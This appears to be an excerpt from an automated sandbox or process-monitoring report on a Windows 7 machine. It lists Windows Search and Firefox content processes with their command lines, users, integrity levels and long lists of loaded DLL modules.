c:\windows\system32\cryptsp.dll
c:\windows\system32\winsta.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\mscms.dll
c:\windows\system32\wpc.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\netutils.dll
c:\program files\adobe\acrobat reader dc\reader\acrord32.exe
c:\progra~1\micros~1\office14\outlook.exe
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\macromed\flash\npswf32_26_0_0_131.dll
c:\program files\java\jre1.8.0_92\bin\dtplugin\npdeployjava1.dll
c:\program files\java\jre1.8.0_92\bin\plugin2\npjp2.dll
c:\progra~1\micros~1\office14\npspwrap.dll
c:\progra~1\micros~1\office14\npauthz.dll
c:\program files\google\update\1.3.34.11\npgoogleupdate3.dll
c:\program files\videolan\vlc\npvlc.dll
c:\program files\adobe\acrobat reader dc\reader\air\nppdf32.dll
c:\windows\system32\audioses.dll
c:\windows\system32\msimg32.dll
c:\program files\mozilla firefox\softokn3.dll
c:\program files\mozilla firefox\freebl3.dll
c:\progra~1\mozill~1\nssckbi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\actxprxy.dll

PID
1508
CMD
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe3_ Global\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
Path
C:\Windows\system32\SearchProtocolHost.exe
Indicators
No indicators
Parent process
––
User
SYSTEM
Integrity Level
SYSTEM
Version:
Company
Microsoft Corporation
Description
Microsoft Windows Search Protocol Host
Version
7.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\searchprotocolhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\tquery.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msshooks.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\msidle.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\mssph.dll
c:\windows\system32\mapi32.dll
c:\windows\system32\authz.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\shell32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\notepad.exe
c:\windows\system32\wshext.dll
c:\windows\system32\version.dll
c:\users\admin\desktop\old firefox data\qldyz51w.default\gmp-widevinecdm\4.10.1440.18\widevinecdm.dll
c:\users\admin\desktop\old firefox data\qldyz51w.default\gmp-gmpopenh264\1.8.1\gmpopenh264.dll
c:\windows\system32\msxml3r.dll

PID
3368
CMD
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2992.0.1625623474\1363512615" -childID 1 -isForBrowser -prefsHandle 1864 -prefMapHandle 1860 -prefsLen 1 -prefMapSize 184763 -safeMode -parentBuildID 20190717172542 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 2992 "\\.\pipe\gecko-crash-server-pipe.2992" 1936 tab
Path
C:\Program Files\Mozilla Firefox\firefox.exe
Indicators
Parent process
firefox.exe
User
admin
Integrity Level
LOW
Version:
Company
Mozilla Corporation
Description
Firefox
Version
68.0.1
Modules
Image
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\mozilla firefox\ucrtbase.dll
c:\program files\mozilla firefox\api-ms-win-core-localization-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l2-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-synch-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-string-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-math-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-time-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-utility-l1-1-0.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\mozilla firefox\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\mozilla firefox\nss3.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\program files\mozilla firefox\lgpllibs.dll
c:\program files\mozilla firefox\xul.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\credui.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\wship6.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\mscms.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\audioses.dll
c:\windows\system32\wpc.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\netutils.dll
c:\program files\mozilla firefox\mozavutil.dll
c:\program files\mozilla firefox\mozavcodec.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\mf.dll
c:\windows\system32\atl.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\dxva2.dll
c:\windows\system32\evr.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\slc.dll
c:\windows\system32\sqmapi.dll
c:\windows\system32\bcrypt.dll
c:\program files\mozilla firefox\softokn3.dll
c:\program files\mozilla firefox\freebl3.dll

PID
1636
CMD
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2992.6.357592080\844747327" -childID 2 -isForBrowser -prefsHandle 2144 -prefMapHandle 2168 -prefsLen 46 -prefMapSize 184763 -safeMode -parentBuildID 20190717172542 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 2992 "\\.\pipe\gecko-crash-server-pipe.2992" 2184 tab
Path
C:\Program Files\Mozilla Firefox\firefox.exe
Indicators
Parent process
firefox.exe
User
admin
Integrity Level
LOW
Version:
Company
Mozilla Corporation
Description
Firefox
Version
68.0.1
Modules
Image
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\mozilla firefox\ucrtbase.dll
c:\program files\mozilla firefox\api-ms-win-core-localization-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l2-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-synch-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-string-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-math-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-time-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-utility-l1-1-0.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\mozilla firefox\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\mozilla firefox\nss3.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\program files\mozilla firefox\lgpllibs.dll
c:\program files\mozilla firefox\xul.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\credui.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\wship6.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\mscms.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\audioses.dll
c:\program files\mozilla firefox\softokn3.dll
c:\program files\mozilla firefox\freebl3.dll

PID
2368
CMD
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2992.12.269264228\230088787" -childID 3 -isForBrowser -prefsHandle 2984 -prefMapHandle 2988 -prefsLen 1752 -prefMapSize 184763 -safeMode -parentBuildID 20190717172542 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 2992 "\\.\pipe\gecko-crash-server-pipe.2992" 3000 tab
Path
C:\Program Files\Mozilla Firefox\firefox.exe
Indicators
Parent process
firefox.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Mozilla Corporation
Description
Firefox
Version
68.0.1
Modules
Image
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\mozilla firefox\ucrtbase.dll
c:\program files\mozilla firefox\api-ms-win-core-localization-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l2-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-synch-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-string-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-math-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-time-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-utility-l1-1-0.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\mozilla firefox\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\mozilla firefox\nss3.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\program files\mozilla firefox\lgpllibs.dll
c:\program files\mozilla firefox\xul.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\credui.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\wship6.dll
c:\windows\system32\mscms.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\audioses.dll

PID
1684
CMD
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2992.18.1033624140\197693122" -childID 4 -isForBrowser -prefsHandle 2996 -prefMapHandle 3108 -prefsLen 8320 -prefMapSize 184763 -safeMode -parentBuildID 20190717172542 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 2992 "\\.\pipe\gecko-crash-server-pipe.2992" 3504 tab
Path
C:\Program Files\Mozilla Firefox\firefox.exe
Indicators
Parent process
firefox.exe
User
admin
Integrity Level
LOW
Version:
Company
Mozilla Corporation
Description
Firefox
Version
68.0.1
Modules
Image
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\mozilla firefox\ucrtbase.dll
c:\program files\mozilla firefox\api-ms-win-core-localization-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l2-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-synch-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-string-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-math-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-time-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-utility-l1-1-0.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\mozilla firefox\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\mozilla firefox\nss3.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\program files\mozilla firefox\lgpllibs.dll
c:\program files\mozilla firefox\xul.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\credui.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wship6.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\mscms.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\audioses.dll
c:\windows\system32\wpc.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\netutils.dll
c:\program files\mozilla firefox\softokn3.dll
c:\program files\mozilla firefox\freebl3.dll

PID
880
CMD
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2992.24.1859956604\1950591132" -childID 5 -isForBrowser -prefsHandle 3940 -prefMapHandle 3944 -prefsLen 8934 -prefMapSize 184763 -safeMode -parentBuildID 20190717172542 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 2992 "\\.\pipe\gecko-crash-server-pipe.2992" 3956 tab
Path
C:\Program Files\Mozilla Firefox\firefox.exe
Indicators
Parent process
firefox.exe
User
admin
Integrity Level
LOW
Version:
Company
Mozilla Corporation
Description
Firefox
Version
68.0.1
Modules
Image
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\api-ms-win-crt-runtime-l1-1-0.dll
c:\program files\mozilla firefox\ucrtbase.dll
c:\program files\mozilla firefox\api-ms-win-core-localization-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-processthreads-l1-1-1.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-core-timezone-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-file-l2-1-0.dll
c:\program files\mozilla firefox\api-ms-win-core-synch-l1-2-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-string-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-heap-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-stdio-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-convert-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-locale-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-math-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-time-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-filesystem-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-environment-l1-1-0.dll
c:\program files\mozilla firefox\api-ms-win-crt-utility-l1-1-0.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\mozilla firefox\api-ms-win-crt-multibyte-l1-1-0.dll
c:\program files\mozilla firefox\nss3.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\program files\mozilla firefox\lgpllibs.dll
c:\program files\mozilla firefox\xul.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\credui.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wship6.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\mscms.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\audioses.dll
c:\windows\system32\wpc.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\netutils.dll
c:\program files\mozilla firefox\softokn3.dll
c:\program files\mozilla firefox\freebl3.dll

PID
2640
CMD
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2992.30.2039794354\1167808431" -childID 6 -isForBrowser -prefsHandle 4372 -prefMapHandle 3372 -prefsLen 9296 -prefMapSize 184763 -safeMode -parentBuildID 20190717172542 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 2992 "\\.\pipe\gecko-crash-server-pipe.2992" 3296 tab
Path
C:\Program Files\Mozilla Firefox\firefox.exe
Indicators
Parent process
firefox.exe
User
admin
Integrity Level
LOW
Version:
Company
Mozilla Corporation
Description
Firefox
Version
68.0.1
Modules
Image
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\version.dll
